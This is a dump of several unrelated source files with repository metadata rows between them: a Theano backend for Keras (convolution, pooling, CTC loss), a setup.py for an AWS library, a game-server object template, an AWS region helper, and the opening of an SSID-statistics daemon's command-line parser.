    kernel = _preprocess_conv2d_kernel(kernel, dim_ordering)
    th_border_mode = _preprocess_border_mode(border_mode)
    # Concrete kernel values are needed to crop even-sized kernels in
    # _postprocess_conv2d_output.
    np_kernel = kernel.eval()
    image_shape = _preprocess_conv2d_image_shape(dim_ordering, image_shape)
    filter_shape = _preprocess_conv2d_filter_shape(dim_ordering, filter_shape)
    # TODO: remove the if statement when theano with no filter dilation is deprecated.
    if filter_dilation == (1, 1):
        conv_out = T.nnet.conv2d(x, kernel,
                                 border_mode=th_border_mode,
                                 subsample=strides,
                                 input_shape=image_shape,
                                 filter_shape=filter_shape)
    else:
        conv_out = T.nnet.conv2d(x, kernel,
                                 border_mode=th_border_mode,
                                 subsample=strides,
                                 input_shape=image_shape,
                                 filter_shape=filter_shape,
                                 filter_dilation=filter_dilation)
    conv_out = _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel,
                                          strides, dim_ordering)
    return conv_out
def deconv2d(x, kernel, output_shape, strides=(1, 1),
             border_mode='valid',
             dim_ordering='default',
             image_shape=None, filter_shape=None):
    """2D deconvolution (transposed convolution).

    # Arguments
        kernel: kernel tensor.
        output_shape: desired dimensions of output.
        strides: strides tuple.
        border_mode: string, "same" or "valid".
        dim_ordering: "tf" or "th".
            Whether to use Theano or TensorFlow dimension ordering
            in inputs/kernels/outputs.
    """
    flip_filters = False
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering ' + dim_ordering)
    x = _preprocess_conv2d_input(x, dim_ordering)
    kernel = _preprocess_conv2d_kernel(kernel, dim_ordering)
    # The gradInputs op expects the kernel with in/out channel axes swapped.
    kernel = kernel.dimshuffle((1, 0, 2, 3))
    th_border_mode = _preprocess_border_mode(border_mode)
    np_kernel = kernel.eval()
    filter_shape = _preprocess_conv2d_filter_shape(dim_ordering, filter_shape)
    filter_shape = tuple(filter_shape[i] for i in (1, 0, 2, 3))
    # Transposed convolution expressed as the gradient of a forward
    # convolution with respect to its inputs.
    op = T.nnet.abstract_conv.AbstractConv2d_gradInputs(imshp=output_shape,
                                                        kshp=filter_shape,
                                                        subsample=strides,
                                                        border_mode=th_border_mode,
                                                        filter_flip=not flip_filters)
    conv_out = op(kernel, x, output_shape[2:])
    conv_out = _postprocess_conv2d_output(conv_out, x, border_mode, np_kernel,
                                          strides, dim_ordering)
    return conv_out
def atrous_conv2d(x, kernel, rate=1,
                  border_mode='valid',
                  dim_ordering='default',
                  image_shape=None, filter_shape=None):
    """Dilated (atrous) 2D convolution -- not available in this backend."""
    raise NotImplementedError
def separable_conv2d(x, depthwise_kernel, pointwise_kernel, strides=(1, 1),
                     border_mode='valid', dim_ordering='default'):
    """Depthwise-separable 2D convolution -- not available in this backend."""
    raise NotImplementedError
def conv3d(x, kernel, strides=(1, 1, 1),
           border_mode='valid', dim_ordering='default',
           volume_shape=None, filter_shape=None,
           filter_dilation=(1, 1, 1)):
    """3D convolution.

    # Arguments
        kernel: kernel tensor.
        strides: strides tuple.
        border_mode: string, "same" or "valid".
        dim_ordering: "tf" or "th".
            Whether to use Theano or TensorFlow dimension ordering
            in inputs/kernels/outputs.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering:', dim_ordering)
    # TODO: remove this if statement when Theano without AbstractConv3d is deprecated
    if not hasattr(T.nnet, 'conv3d'):
        if filter_dilation != (1, 1, 1):
            raise ValueError('conv3d with filter dilation requires Theano '
                             '0.9.0dev3 or newer.')
        # Legacy code path for Theano versions without T.nnet.conv3d.
        return _old_theano_conv3d(x, kernel, strides, border_mode,
                                  dim_ordering, volume_shape, filter_shape)
    # Convert input / kernel / shape metadata to channels-first layout.
    x = _preprocess_conv3d_input(x, dim_ordering)
    kernel = _preprocess_conv3d_kernel(kernel, dim_ordering)
    th_border_mode = _preprocess_border_mode(border_mode)
    # Concrete kernel values are needed to crop even-sized kernels in
    # _postprocess_conv3d_output.
    np_kernel = kernel.eval()
    volume_shape = _preprocess_conv3d_volume_shape(dim_ordering, volume_shape)
    filter_shape = _preprocess_conv3d_filter_shape(dim_ordering, filter_shape)
    conv_out = T.nnet.conv3d(x, kernel,
                             border_mode=th_border_mode,
                             subsample=strides,
                             input_shape=volume_shape,
                             filter_shape=filter_shape,
                             filter_dilation=filter_dilation)
    conv_out = _postprocess_conv3d_output(conv_out, x, border_mode, np_kernel,
                                          strides, dim_ordering)
    return conv_out
# TODO: remove this function when theano without AbstractConv3d is deprecated
def _old_theano_conv3d(x, kernel, strides=(1, 1, 1),
                       border_mode='valid', dim_ordering='default',
                       volume_shape=None, filter_shape=None):
    """3D convolution via the legacy `conv3d2d` op.

    Run on cuDNN if available.
    border_mode: string, "same" or "valid".
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering:', dim_ordering)
    if border_mode not in {'same', 'valid'}:
        raise ValueError('Invalid border mode:', border_mode)
    if dim_ordering == 'tf':
        # TF uses the last dimension as channel dimension,
        # instead of the 2nd one.
        # TH input shape: (samples, input_depth, conv_dim1, conv_dim2, conv_dim3)
        # TF input shape: (samples, conv_dim1, conv_dim2, conv_dim3, input_depth)
        # TH kernel shape: (out_depth, input_depth, kernel_dim1, kernel_dim2, kernel_dim3)
        # TF kernel shape: (kernel_dim1, kernel_dim2, kernel_dim3, input_depth, out_depth)
        x = x.dimshuffle((0, 4, 1, 2, 3))
        kernel = kernel.dimshuffle((4, 3, 0, 1, 2))
        if volume_shape:
            volume_shape = (volume_shape[0], volume_shape[4],
                            volume_shape[1], volume_shape[2], volume_shape[3])
        if filter_shape:
            filter_shape = (filter_shape[4], filter_shape[3],
                            filter_shape[0], filter_shape[1], filter_shape[2])
    if border_mode == 'same':
        # 'same' is emulated by zero-padding the input to the size a
        # 'valid' convolution would need; stride 1 only.
        assert(strides == (1, 1, 1))
        pad_dim1 = (kernel.shape[2] - 1)
        pad_dim2 = (kernel.shape[3] - 1)
        pad_dim3 = (kernel.shape[4] - 1)
        output_shape = (x.shape[0], x.shape[1],
                        x.shape[2] + pad_dim1,
                        x.shape[3] + pad_dim2,
                        x.shape[4] + pad_dim3)
        output = T.zeros(output_shape)
        indices = (slice(None), slice(None),
                   slice(pad_dim1 // 2, x.shape[2] + pad_dim1 // 2),
                   slice(pad_dim2 // 2, x.shape[3] + pad_dim2 // 2),
                   slice(pad_dim3 // 2, x.shape[4] + pad_dim3 // 2))
        x = T.set_subtensor(output[indices], x)
        border_mode = 'valid'
    border_mode_3d = (border_mode, border_mode, border_mode)
    # conv3d2d expects (samples, time, channels, rows, cols) ordering.
    conv_out = conv3d2d.conv3d(signals=x.dimshuffle(0, 2, 1, 3, 4),
                               filters=kernel.dimshuffle(0, 2, 1, 3, 4),
                               border_mode=border_mode_3d)
    conv_out = conv_out.dimshuffle(0, 2, 1, 3, 4)
    # support strides by manually slicing the output
    if strides != (1, 1, 1):
        conv_out = conv_out[:, :, ::strides[0], ::strides[1], ::strides[2]]
    if dim_ordering == 'tf':
        conv_out = conv_out.dimshuffle((0, 2, 3, 4, 1))
    return conv_out
def pool2d(x, pool_size, strides=(1, 1), border_mode='valid',
           dim_ordering='default', pool_mode='max'):
    """2D pooling ('max' or 'avg') over the two spatial dims of a 4D tensor.

    # Arguments
        x: 4D input tensor.
        pool_size: tuple of 2 ints, pooling window size.
        strides: tuple of 2 ints, pooling strides.
        border_mode: string, "same" or "valid".
        dim_ordering: 'th' (channels first), 'tf' (channels last) or 'default'.
        pool_mode: 'max' or 'avg'.

    # Returns
        Pooled tensor, in the same dim ordering as the input.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering:', dim_ordering)
    assert pool_size[0] >= 1 and pool_size[1] >= 1
    if border_mode == 'same':
        # Pad so output size is ceil(input / stride); odd windows > 2 need
        # one unit less padding than even ones.
        w_pad = pool_size[0] - 2 if pool_size[0] > 2 and pool_size[0] % 2 == 1 else pool_size[0] - 1
        h_pad = pool_size[1] - 2 if pool_size[1] > 2 and pool_size[1] % 2 == 1 else pool_size[1] - 1
        padding = (w_pad, h_pad)
    elif border_mode == 'valid':
        padding = (0, 0)
    else:
        raise ValueError('Invalid border mode:', border_mode)
    if dim_ordering == 'tf':
        # Theano pooling works on channels-first layout.
        x = x.dimshuffle((0, 3, 1, 2))
    if pool_mode == 'max':
        # TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
        try:
            # new interface (introduced in 0.9.0dev4)
            pool_out = pool.pool_2d(x, ws=pool_size, stride=strides,
                                    ignore_border=True,
                                    pad=padding,
                                    mode='max')
        except TypeError:
            # old interface
            pool_out = pool.pool_2d(x, ds=pool_size, st=strides,
                                    ignore_border=True,
                                    padding=padding,
                                    mode='max')
    elif pool_mode == 'avg':
        # TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
        try:
            # new interface (introduced in 0.9.0dev4)
            pool_out = pool.pool_2d(x, ws=pool_size, stride=strides,
                                    ignore_border=True,
                                    pad=padding,
                                    mode='average_exc_pad')
        except TypeError:
            # old interface
            pool_out = pool.pool_2d(x, ds=pool_size, st=strides,
                                    ignore_border=True,
                                    padding=padding,
                                    mode='average_exc_pad')
    else:
        raise ValueError('Invalid pooling mode:', pool_mode)
    if border_mode == 'same':
        # Trim the extra rows/cols introduced by the symmetric padding.
        expected_width = (x.shape[2] + strides[0] - 1) // strides[0]
        expected_height = (x.shape[3] + strides[1] - 1) // strides[1]
        pool_out = pool_out[:, :,
                            : expected_width,
                            : expected_height]
    if dim_ordering == 'tf':
        pool_out = pool_out.dimshuffle((0, 2, 3, 1))
    return pool_out
def pool3d(x, pool_size, strides=(1, 1, 1), border_mode='valid',
           dim_ordering='default', pool_mode='max'):
    """3D pooling ('max' or 'avg') over the three spatial dims of a 5D tensor.

    # Arguments
        x: 5D input tensor.
        pool_size: tuple of 3 ints, pooling window size.
        strides: tuple of 3 ints, pooling strides.
        border_mode: string, "same" or "valid".
        dim_ordering: 'th' (channels first), 'tf' (channels last) or 'default'.
        pool_mode: 'max' or 'avg'.

    # Returns
        Pooled tensor, in the same dim ordering as the input.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering:', dim_ordering)
    # TODO: remove this if statement when Theano without pool_3d is deprecated
    # (pool_3d was introduced after 0.9.0dev3)
    if not hasattr(T.signal.pool, 'pool_3d'):
        return _old_theano_pool3d(x, pool_size, strides, border_mode,
                                  dim_ordering, pool_mode)
    if border_mode == 'same':
        # Pad so output size is ceil(input / stride) along each spatial dim.
        w_pad = pool_size[0] - 2 if pool_size[0] % 2 == 1 else pool_size[0] - 1
        h_pad = pool_size[1] - 2 if pool_size[1] % 2 == 1 else pool_size[1] - 1
        d_pad = pool_size[2] - 2 if pool_size[2] % 2 == 1 else pool_size[2] - 1
        padding = (w_pad, h_pad, d_pad)
    elif border_mode == 'valid':
        padding = (0, 0, 0)
    else:
        raise ValueError('Invalid border mode:', border_mode)
    if dim_ordering == 'tf':
        # Theano pooling works on channels-first layout.
        x = x.dimshuffle((0, 4, 1, 2, 3))
    if pool_mode == 'max':
        # TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
        try:
            # new interface (introduced in 0.9.0dev4)
            pool_out = pool.pool_3d(x, ws=pool_size, stride=strides,
                                    ignore_border=True,
                                    pad=padding,
                                    mode='max')
        except TypeError:
            # old interface
            pool_out = pool.pool_3d(x, ds=pool_size, st=strides,
                                    ignore_border=True,
                                    padding=padding,
                                    mode='max')
    elif pool_mode == 'avg':
        # TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
        try:
            # new interface (introduced in 0.9.0dev4)
            pool_out = pool.pool_3d(x, ws=pool_size, stride=strides,
                                    ignore_border=True,
                                    pad=padding,
                                    mode='average_exc_pad')
        except TypeError:
            # old interface
            pool_out = pool.pool_3d(x, ds=pool_size, st=strides,
                                    ignore_border=True,
                                    padding=padding,
                                    mode='average_exc_pad')
    else:
        raise ValueError('Invalid pooling mode:', pool_mode)
    if border_mode == 'same':
        # Trim the extra entries introduced by the symmetric padding.
        expected_width = (x.shape[2] + strides[0] - 1) // strides[0]
        expected_height = (x.shape[3] + strides[1] - 1) // strides[1]
        expected_depth = (x.shape[4] + strides[2] - 1) // strides[2]
        pool_out = pool_out[:, :,
                            : expected_width,
                            : expected_height,
                            : expected_depth]
    if dim_ordering == 'tf':
        pool_out = pool_out.dimshuffle((0, 2, 3, 4, 1))
    return pool_out
# TODO: remove this function when Theano without pool_3d is deprecated
# (pool_3d was introduced after 0.9.0dev3)
def _old_theano_pool3d(x, pool_size, strides=(1, 1, 1), border_mode='valid',
                       dim_ordering='default', pool_mode='max'):
    """3D pooling fallback built from two `pool_2d` passes.

    Used only on Theano versions that lack `pool_3d` (older than
    0.9.0dev4). Pools over (dim1, dim2) first, then over dim3.
    `border_mode="same"` is not supported on this path.
    """
    if dim_ordering == 'default':
        dim_ordering = image_dim_ordering()
    if dim_ordering not in {'th', 'tf'}:
        raise ValueError('Unknown dim_ordering:', dim_ordering)
    if border_mode == 'same':
        # TODO: add implementation for border_mode="same"
        raise ValueError('border_mode="same" not supported with Theano.')
    elif border_mode == 'valid':
        ignore_border = True
        padding = (0, 0)
    else:
        raise ValueError('Invalid border mode:', border_mode)
    if dim_ordering == 'tf':
        # Theano pooling works on channels-first layout.
        x = x.dimshuffle((0, 4, 1, 2, 3))
    if pool_mode == 'max':
        # pooling over conv_dim2, conv_dim1 (last two channels)
        output = pool.pool_2d(input=x.dimshuffle(0, 1, 4, 3, 2),
                              ds=(pool_size[1], pool_size[0]),
                              st=(strides[1], strides[0]),
                              ignore_border=ignore_border,
                              padding=padding,
                              mode='max')
        # pooling over conv_dim3
        pool_out = pool.pool_2d(input=output.dimshuffle(0, 1, 4, 3, 2),
                                ds=(1, pool_size[2]),
                                st=(1, strides[2]),
                                ignore_border=ignore_border,
                                padding=padding,
                                mode='max')
    elif pool_mode == 'avg':
        # pooling over conv_dim2, conv_dim1 (last two channels)
        output = pool.pool_2d(input=x.dimshuffle(0, 1, 4, 3, 2),
                              ds=(pool_size[1], pool_size[0]),
                              st=(strides[1], strides[0]),
                              ignore_border=ignore_border,
                              padding=padding,
                              mode='average_exc_pad')
        # pooling over conv_dim3
        pool_out = pool.pool_2d(input=output.dimshuffle(0, 1, 4, 3, 2),
                                ds=(1, pool_size[2]),
                                st=(1, strides[2]),
                                ignore_border=ignore_border,
                                padding=padding,
                                mode='average_exc_pad')
    else:
        raise ValueError('Invalid pooling mode:', pool_mode)
    if dim_ordering == 'tf':
        pool_out = pool_out.dimshuffle((0, 2, 3, 4, 1))
    return pool_out
# RANDOMNESS
def random_normal(shape, mean=0.0, std=1.0, dtype=None, seed=None):
    """Return a symbolic tensor of normal samples N(mean, std)."""
    if dtype is None:
        dtype = floatx()
    if seed is None:
        # Upper bound must be an int: passing the float 10e6 to
        # np.random.randint is deprecated and rejected by modern numpy.
        seed = np.random.randint(1, 10 ** 7)
    rng = RandomStreams(seed=seed)
    return rng.normal(size=shape, avg=mean, std=std, dtype=dtype)
def random_uniform(shape, low=0.0, high=1.0, dtype=None, seed=None):
    """Return a symbolic tensor of uniform samples in [low, high)."""
    if dtype is None:
        dtype = floatx()
    if seed is None:
        # Upper bound must be an int: passing the float 10e6 to
        # np.random.randint is deprecated and rejected by modern numpy.
        seed = np.random.randint(1, 10 ** 7)
    rng = RandomStreams(seed=seed)
    return rng.uniform(shape, low=low, high=high, dtype=dtype)
def random_binomial(shape, p=0.0, dtype=None, seed=None):
    """Return a symbolic tensor of Bernoulli(p) samples."""
    if dtype is None:
        dtype = floatx()
    if seed is None:
        # Upper bound must be an int: passing the float 10e6 to
        # np.random.randint is deprecated and rejected by modern numpy.
        seed = np.random.randint(1, 10 ** 7)
    rng = RandomStreams(seed=seed)
    return rng.binomial(shape, p=p, dtype=dtype)
# Theano implementation of CTC
# Used with permission from Shawn Tan
# https://github.com/shawntan/
# Note that tensorflow's native CTC code is significantly
# faster than this
def ctc_interleave_blanks(Y):
    """Interleave CTC blanks (label -1) around each symbol of `Y`.

    Produces a vector of length 2*len(Y)+1 where even positions hold -1
    (the blank) and odd positions hold the original labels.
    """
    Y_ = T.alloc(-1, Y.shape[0] * 2 + 1)
    Y_ = T.set_subtensor(Y_[T.arange(Y.shape[0]) * 2 + 1], Y)
    return Y_
def ctc_create_skip_idxs(Y):
    """Return indices in the blank-interleaved sequence where a CTC
    'skip' transition (jump over a blank) is legal, i.e. label
    positions whose symbol differs from the symbol two slots ahead.
    """
    skip_idxs = T.arange((Y.shape[0] - 3) // 2) * 2 + 1
    non_repeats = T.neq(Y[skip_idxs], Y[skip_idxs + 2])
    return skip_idxs[non_repeats.nonzero()]
def ctc_update_log_p(skip_idxs, zeros, active, log_p_curr, log_p_prev):
    """One forward (or backward) CTC recursion step in log space.

    Accumulates stay / advance / skip transitions into the previous
    log-probabilities and adds the current frame's log-probabilities,
    tracking `active`, the number of alignment states reachable so far,
    to avoid touching unreachable tail entries.
    """
    active_skip_idxs = skip_idxs[(skip_idxs < active).nonzero()]
    # States reachable after this step: one further than before, or past
    # the furthest legal skip, capped at the sequence length.
    active_next = T.cast(T.minimum(
        T.maximum(
            active + 1,
            T.max(T.concatenate([active_skip_idxs, [-1]])) + 2 + 1
        ), log_p_curr.shape[0]), 'int32')
    # Shift to probability space around the max for numerical stability.
    common_factor = T.max(log_p_prev[:active])
    p_prev = T.exp(log_p_prev[:active] - common_factor)
    _p_prev = zeros[:active_next]
    # copy over (stay in the same state)
    _p_prev = T.set_subtensor(_p_prev[:active], p_prev)
    # previous transitions (advance by one state)
    _p_prev = T.inc_subtensor(_p_prev[1:], _p_prev[:-1])
    # skip transitions (jump over a blank between distinct symbols)
    _p_prev = T.inc_subtensor(_p_prev[active_skip_idxs + 2], p_prev[active_skip_idxs])
    updated_log_p_prev = T.log(_p_prev) + common_factor
    log_p_next = T.set_subtensor(
        zeros[:active_next],
        log_p_curr[:active_next] + updated_log_p_prev
    )
    return active_next, log_p_next
def ctc_path_probs(predict, Y, alpha=1e-4):
    """Run the CTC forward-backward recursion over frame predictions.

    `predict` holds per-frame class probabilities; `Y` is the
    blank-interleaved label sequence. Returns per-(frame, state)
    log path probabilities plus a mask of reachable states.
    """
    # Smooth predictions so log() never sees an exact zero.
    smoothed_predict = (1 - alpha) * predict[:, Y] + alpha * np.float32(1.) / Y.shape[0]
    L = T.log(smoothed_predict)
    zeros = T.zeros_like(L[0])
    log_first = zeros
    f_skip_idxs = ctc_create_skip_idxs(Y)
    b_skip_idxs = ctc_create_skip_idxs(Y[::-1])  # there should be a shortcut to calculating this
    def step(log_f_curr, log_b_curr, f_active, log_f_prev, b_active, log_b_prev):
        # Advance forward and backward recursions one frame in lockstep;
        # the backward pass consumes L reversed in both time and state.
        f_active_next, log_f_next = ctc_update_log_p(f_skip_idxs, zeros, f_active, log_f_curr, log_f_prev)
        b_active_next, log_b_next = ctc_update_log_p(b_skip_idxs, zeros, b_active, log_b_curr, log_b_prev)
        return f_active_next, log_f_next, b_active_next, log_b_next
    [f_active, log_f_probs, b_active, log_b_probs], _ = theano.scan(
        step, sequences=[L, L[::-1, ::-1]], outputs_info=[np.int32(1), log_first, np.int32(1), log_first])
    # A state contributes only if both recursions have reached it.
    idxs = T.arange(L.shape[1]).dimshuffle('x', 0)
    mask = (idxs < f_active.dimshuffle(0, 'x')) & (idxs < b_active.dimshuffle(0, 'x'))[::-1, ::-1]
    # forward + backward double-counts the frame emission; subtract L once.
    log_probs = log_f_probs + log_b_probs[::-1, ::-1] - L
    return log_probs, mask
def ctc_cost(predict, Y):
    """Negative log-likelihood of label sequence `Y` under CTC.

    Sums path probabilities over all reachable alignments using the
    log-sum-exp trick (subtracting the max) for numerical stability.
    """
    log_probs, mask = ctc_path_probs(predict, ctc_interleave_blanks(Y))
    common_factor = T.max(log_probs)
    total_log_prob = T.log(T.sum(T.exp(log_probs - common_factor)[mask.nonzero()])) + common_factor
    return -total_log_prob
# batchifies original CTC code
def ctc_batch_cost(y_true, y_pred, input_length, label_length):
    """Runs CTC loss algorithm on each batch element.

    # Arguments
        y_true: tensor (samples, max_string_length) containing the truth labels
        y_pred: tensor (samples, time_steps, num_categories) containing the prediction,
                or output of the softmax
        input_length: tensor (samples,1) containing the sequence length for
                each batch item in y_pred
        label_length: tensor (samples,1) containing the sequence length for
                each batch item in y_true

    # Returns
        Tensor with shape (samples,1) containing the
               CTC loss of each element
    """
    def ctc_step(y_true_step, y_pred_step, input_length_step, label_length_step):
        # Trim padding using the per-sample lengths before scoring.
        y_pred_step = y_pred_step[0: input_length_step[0]]
        y_true_step = y_true_step[0:label_length_step[0]]
        return ctc_cost(y_pred_step, y_true_step)
    # scan applies ctc_step to each batch element in turn.
    ret, _ = theano.scan(
        fn=ctc_step,
        outputs_info=None,
        sequences=[y_true, y_pred, input_length, label_length]
    )
    ret = ret.dimshuffle('x', 0)
    return ret
# HIGH ORDER FUNCTIONS
def map_fn(fn, elems, name=None):
    """Map the function fn over the elements elems and return the outputs.

    # Arguments
        fn: Callable that will be called upon each element in elems
        elems: tensor, at least 2 dimensional
        name: A string name for the map node in the graph

    # Returns
        Tensor with first dimension equal to the elems and second depending on
        fn
    """
    # theano.map returns (outputs, updates); only the outputs are needed.
    outputs, _updates = theano.map(fn, elems, name=name)
    return outputs
def foldl(fn, elems, initializer=None, name=None):
    """Reduce elems using fn to combine them from left to right.

    # Arguments
        fn: Callable that will be called upon each element in elems and an
            accumulator, for instance lambda acc, x: acc + x
        elems: tensor
        initializer: The first value used (elems[0] in case of None)
        name: A string name for the foldl node in the graph

    # Returns
        Same type and shape as initializer
    """
    if initializer is None:
        initializer, elems = elems[0], elems[1:]
    # Theano calls the step function with the element first and the
    # accumulator second, so flip the argument order of fn.
    def flipped(x, acc):
        return fn(acc, x)
    return theano.foldl(flipped, elems, initializer, name=name)[0]
def foldr(fn, elems, initializer=None, name=None):
    """Reduce elems using fn to combine them from right to left.

    # Arguments
        fn: Callable that will be called upon each element in elems and an
            accumulator, for instance lambda acc, x: acc + x
        elems: tensor
        initializer: The first value used (elems[-1] in case of None)
        name: A string name for the foldr node in the graph

    # Returns
        Same type and shape as initializer
    """
    if initializer is None:
        initializer, elems = elems[-1], elems[:-1]
    # Theano calls the step function with the element first and the
    # accumulator second, so flip the argument order of fn.
    def flipped(x, acc):
        return fn(acc, x)
    return theano.foldr(flipped, elems, initializer, name=name)[0]
| 33.787081
| 125
| 0.601572
|
4a07b003c8d845afc73bfa6e59ebfbaf3584af25
| 947
|
py
|
Python
|
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | 22
|
2021-11-24T01:23:07.000Z
|
2022-03-26T23:24:46.000Z
|
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | null | null | null |
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | 3
|
2021-12-10T09:42:51.000Z
|
2022-02-16T02:22:50.000Z
|
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import setuptools
# Read the long description from the adjacent README. The encoding is
# specified explicitly so the install does not depend on the host locale.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="Media Replay Engine Workflow Helper",
    version="1.0.0",
    author="Aravindharaj Rajendran",
    author_email="redacted@example.com",
    description="Helper library used by the Media Replay Engine internal lambda functions to interact with the control plane",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/aws-solutions/aws-media-replay-engine",
    packages=setuptools.find_packages(),
    install_requires=[
        'urllib3',
        'requests',
        'requests-aws4auth'
    ],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: Other/Proprietary License",
        "Operating System :: OS Independent",
    ],
)
| 31.566667
| 126
| 0.695882
|
4a07b014b3f45af3b623d5626c483a845b5faa88
| 112
|
py
|
Python
|
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | null | null | null |
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | null | null | null |
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | 1
|
2018-07-26T01:42:02.000Z
|
2018-07-26T01:42:02.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from connection import Connection
from pool import ConnectionPool
| 18.666667
| 33
| 0.741071
|
4a07b113ac259650f9a915f5dd3a8f391e0d877a
| 204
|
py
|
Python
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 2,959
|
2018-05-08T21:48:56.000Z
|
2020-08-24T14:35:39.000Z
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1,469
|
2018-05-08T22:44:28.000Z
|
2020-08-24T20:19:24.000Z
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 642
|
2018-05-08T22:09:19.000Z
|
2020-08-17T09:04:37.000Z
|
"""
Contains helpers for providing default values
"""
from botocore.session import get_session
def get_default_aws_region() -> str:
    """Return the region configured for botocore, or "us-east-1" if none."""
    configured_region = get_session().get_config_variable("region")
    return configured_region if configured_region else "us-east-1"
| 22.666667
| 69
| 0.759804
|
4a07b11f571514006a50bc61964c8db10ad02fde
| 464
|
py
|
Python
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
    """Build the Intangible draft-schematic object for this template.

    Autogenerated: hand edits belong only between the BEGIN/END
    MODIFICATIONS markers, or the generator will discard them.
    """
    result = Intangible()

    result.template = "object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.iff"
    result.attribute_template_id = -1
    result.stfName("string_id_table","")

    #### BEGIN MODIFICATIONS ####

    #### END MODIFICATIONS ####

    return result
| 27.294118
| 90
| 0.737069
|
4a07b1416e99ca56cc5bac659f688589c43cae82
| 1,914
|
py
|
Python
|
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2
import monitor
import argparse
import ssidstat
__DEFAULT_INTERVAL = 10
__DEFAULT_PID_FILE = '/var/lib/ssidstat/ssidstatd.pid'
__DEFAULT_OUT_FILE = '/var/lib/ssidstat/ssidstatd.out'
__DEFAULT_ERR_FILE = '/var/lib/ssidstat/ssidstatd.err'
__DEFAULT_DB_FILE = '/var/lib/ssidstat/ssidstatd.db'
def main():
    """CLI entry point for the ssidstat daemon (Python 2).

    Parses command-line flags and then starts, stops, restarts or
    queries the monitoring daemon accordingly.
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("-v", "--version", action="store_true", help="show ssidstat version")
    parser.add_argument("--pidfile", help="pidfile, default is {}".format(__DEFAULT_PID_FILE), default=__DEFAULT_PID_FILE)
    parser.add_argument("--db", help="database file, default is {}".format(__DEFAULT_DB_FILE), default=__DEFAULT_DB_FILE)
    parser.add_argument("--outlog", help="standard output file, default is {}".format(__DEFAULT_OUT_FILE), default=__DEFAULT_OUT_FILE)
    parser.add_argument("--errlog", help="standard error file, default is {}".format(__DEFAULT_ERR_FILE), default=__DEFAULT_ERR_FILE)
    parser.add_argument("--interval", help="polling interval (secs), default is {} seconds".format(__DEFAULT_INTERVAL), default=__DEFAULT_INTERVAL)
    parser.add_argument("--status", action="store_true", help="check whether ssidstat daemon is running or not")
